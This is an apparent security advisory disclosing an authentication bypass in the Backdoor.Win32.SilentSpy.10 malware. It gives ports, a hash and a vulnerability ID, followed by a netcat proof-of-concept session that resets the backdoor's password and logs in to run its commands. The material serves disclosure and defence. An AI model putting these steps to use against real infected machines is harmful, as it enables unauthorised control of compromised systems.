Tuesday, January 4, 2022

Backdoor.Win32.SilentSpy.10 Authentication Bypass / Command Execution

Threat: Backdoor.Win32.SilentSpy.10
Vulnerability: Authentication Bypass Command Execution
Description: The malware listens on TCP ports 21, 7007. Third-party attackers who can reach an infected system can change the server password on the fly using the !SETSERVPASS! command, logon and run commands made available by the malware.
Type: PE32
MD5: a7ce38e60cf08f2b234f34043b87e701
Vuln ID: MVID-2021-0440
Disclosure: 12/31/2021

nc64.exe x.x.x.x 7007
!STATUS!Server password has been changed

!PASS! abc123
!PASSOK!!STATUS!Connnected to º∩LΘn7 ºp

!STATUS!Symbol has been drawn

!STATUS!Server name has been changed

nc64.exe x.x.x.x 7007
!PASS! abc123
!PASSOK!!STATUS!Connnected to HATE

